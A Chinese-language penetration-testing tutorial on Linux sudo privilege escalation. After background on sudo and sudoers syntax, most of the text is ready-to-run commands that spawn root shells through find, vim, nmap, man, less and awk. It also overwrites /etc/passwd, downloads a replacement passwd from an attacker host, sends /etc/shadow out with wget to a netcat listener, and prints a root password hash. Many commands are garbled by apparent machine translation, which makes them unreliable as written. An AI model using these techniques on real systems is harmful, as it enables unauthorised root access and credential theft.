在渗透中,我们拿到的webshell和反弹回来的shell权限可能都不高,如果我们可以使用sudo命令访问某些程序,则我们可以使用sudo
可以提权。在这里,我们可以通过调用一些二进制文件,这些文件可以帮助我们使用sudo命令提升特权。但是在特权升级之前,让我们了解一些sudoer文件语法,sudo命令是什么?;)。
sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。
基础
它的特性主要有这样几点:
§ sudo能够限制用户只在某台主机上运行某些命令。
§ sudo提供了丰富的日志,详细地记录了每个用户干了什么。它能够将日志传到中心主机或者日志服务器。
§ sudo使用时间戳文件来执行类似的“检票”系统。当用户调用sudo并且输入它的密码时,用户获得了一张存活期为5分钟的票(这个值可以在编译的时候改变)。
§ sudo的配置文件是sudoers文件,它允许系统管理员集中的管理用户的使用权限和使用的主机。它所存放的位置默认是在/etc/sudoers,属性必须为0440。
在sudo于1980年前后被写出之前,一般用户管理系统的方式是利用su切换为超级用户。但是使用su的缺点之一在于必须要先告知超级用户的密码。
sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息,登记在特殊的文件中(通常是/etc/sudoers),即完成对该用户的授权(此时该用户称为“sudoer”);在一般用户需要取得特殊权限时,其可在命令前加上“sudo”,此时sudo将会询问该用户自己的密码(以确认终端机前的是该用户本人),回答后系统即会将该命令的进程以超级用户的权限运行。之后的一段时间内(默认为5分钟,可在/etc/sudoers自定义),使用sudo不需要再次输入密码。
由于不需要超级用户的密码,部分Unix系统甚至利用sudo使一般用户取代超级用户作为管理帐号,例如Ubuntu、Mac OS X等。
参数说明:
语法
root ALL=(ALL) ALL
说明1:root用户可以从 ALL 终端作为 ALL (任意)用户执行,并运行 ALL (任意)命令。
第一部分是用户,第二部分是用户可以在其中使用sudo
命令的终端,第三部分是他可以充当的用户,最后一部分是他在使用时可以运行的命令。sudo
touhid ALL= /sbin/poweroff
说明2:以上命令,使用户可以从任何终端使用touhid的用户密码关闭命令电源。
touhid ALL = (root) NOPASSWD: /usr/bin/find
说明3:上面的命令,使用户可以从任何终端运行,以root用户身份运行命令find 而无需密码。
要利用sudo用户,您需要找到您必须允许的命令。sudo -l
上面的命令显示了允许当前用户使用的命令。
此处sudo -l,显示用户已允许以root用户身份执行所有此二进制文件而无需密码。
让我们一一查看所有二进制文件(仅在索引中提到)和将特权提升给root用户。
sudo find / etc / passwd -exec / bin / sh \;
要么
sudo find / bin -name nano -exec / bin / sh \;
sudo vim -c'!sh'
sudo nmap-交互式
nmap>!sh
sh-4.1#
注意:nmap –interactive选项在最新的nmap中不可用。
也可以
echo“ os.execute('/ bin / sh')”> /tmp/shell.nse && sudo nmap --script = / tmp / shell.nse
sudo man man
之后按!按下并按Enter
sudo less / etc / hosts
sudo more / etc / hosts
之后按!按下并按Enter
sudo awk'BEGIN {system(“ / bin / sh”)}'
nano是使用此编辑器的文本编辑器,在您需要切换用户之后,您可以修改passwd文件并将用户添加为root特权。在/ etc / passwd中添加此行,以将用户添加为root特权。
touhid: 6 bxwJfzor
sudo nano / etc / passwd
现在切换用户密码是:test
su touhid
这种非常酷的方式要求Web服务器下载文件。这样我从没在任何地方见过。让我们解释一下。
在At客者一边。
在要提权主机方面。
sudo wget http://192.168.56.1:8080/passwd -O / etc / passwd
现在切换用户密码是:test
su touhid
注意:如果您要从服务器上转储文件,例如root的ssh密钥,shadow文件等。
sudo wget --post-file = / etc / shadow 192.168.56.1:8080
攻击者的设置侦听器:nc – lvp 8080
但是,我们无法获得Shell和Cant编辑系统文件。
但是使用它 我们可以查看系统文件。
sudo apache2 -f / etc / shadow
输出是这样的:
Syntax error on line 1 of /etc/shadow:
Invalid command 'root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:17298:0:99999:7:::', perhaps misspelled or defined by a module not included in the server configuration
可悲的是没有shell。但是我们可以现在提取root哈希,然后破解了哈希